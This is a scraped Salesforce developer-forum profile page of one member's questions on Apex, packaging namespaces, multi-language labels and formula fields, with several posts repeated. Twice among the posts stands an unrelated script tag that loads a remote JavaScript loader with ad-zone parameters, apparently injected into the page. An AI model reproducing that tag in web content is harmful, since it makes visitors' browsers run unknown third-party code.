• Member since 2012

• Chatter
    Feed
    Best Answers
    Likes Given
    Questions
    Replies

Hello eveyone 

is there any option to make application on salesforce in multi language?

I mean to say suppose i want to change language dynamic of my all fields and label as per user choice.
if any user want to see it in Germany language than all app's fields and label should be in Germany. and it should be done for other languages same..

Thanks  

• January 25, 2013

i have uploaded my package successfully.

but when installing in onother org than some of my app's pages are not grtting perfect url with namespace so its giving "no page found. create new page." error.
so i need to update url with Namespace of my package.

so is there any way to do it.

its urgent ...

• December 05, 2012

how to get Domain Name of our Org.  in Apex???

• September 25, 2012

hello

Is it possible to get name of the Group in which user has posted??

Thanxs ...

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
  • August 30, 2012

hello everyone..

How to get/use data Storage limit  into Apex.
suppose i want to check what is data limit for the account which is currently using my application.

then how to check it by APEX ??

Thanks in Advance..

• August 27, 2012

hello,
I want to create ".Zip" file by APEX which can include other files like .jpg,.txt etc...

THANXS..

• August 22, 2012
I'm trying to write a formla for a text field.  We have a "Communication Preference Confirmed" text field that I would like to show "Recieved" if the "Communication Opt In " check box = True OR if the Email Opt Out = True

ALSO

We would also like the "Communication Preference Confirmed" text field to show "Required" if the "Communication Opt in"  checkbox is blank and the "Email Opt Out" = False

Thanks!
Hi i would like to know if it's possible for a formula to calculate the # of days between 2 dates with a couple exceptions.

Example count days between Jan 1st 2013 - Dec 31st 2013 minus christmas day(dec 25) , new years (dec 31st).....

Any workaround/idea would be appreciated.

thx
  • March 03, 2014
Hi,
I have a custom button through which i am submitting a record for approval.
So i want to remove the standard 'Submit For Approval' and 'Recall Approval Request' button from the approval history related List.
I tried to create a Home Page Component to hide it, but it doesn't work.
Please let me know whether i am missing out something.

Below is my code:

<script>
$j = jQuery.noConflict();
$j("input[name='piSubmit']").hide();
</script>

Thanks.

Hello eveyone 

is there any option to make application on salesforce in multi language?

I mean to say suppose i want to change language dynamic of my all fields and label as per user choice.
if any user want to see it in Germany language than all app's fields and label should be in Germany. and it should be done for other languages same..

Thanks  

• January 25, 2013

how to get Domain Name of our Org.  in Apex???

• September 25, 2012

hello

Is it possible to get name of the Group in which user has posted??

Thanxs ...

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
  • August 30, 2012

hello,
I want to create ".Zip" file by APEX which can include other files like .jpg,.txt etc...

THANXS..

• August 22, 2012
I'm trying to write a formla for a text field.  We have a "Communication Preference Confirmed" text field that I would like to show "Recieved" if the "Communication Opt In " check box = True OR if the Email Opt Out = True

ALSO

We would also like the "Communication Preference Confirmed" text field to show "Required" if the "Communication Opt in"  checkbox is blank and the "Email Opt Out" = False

Thanks!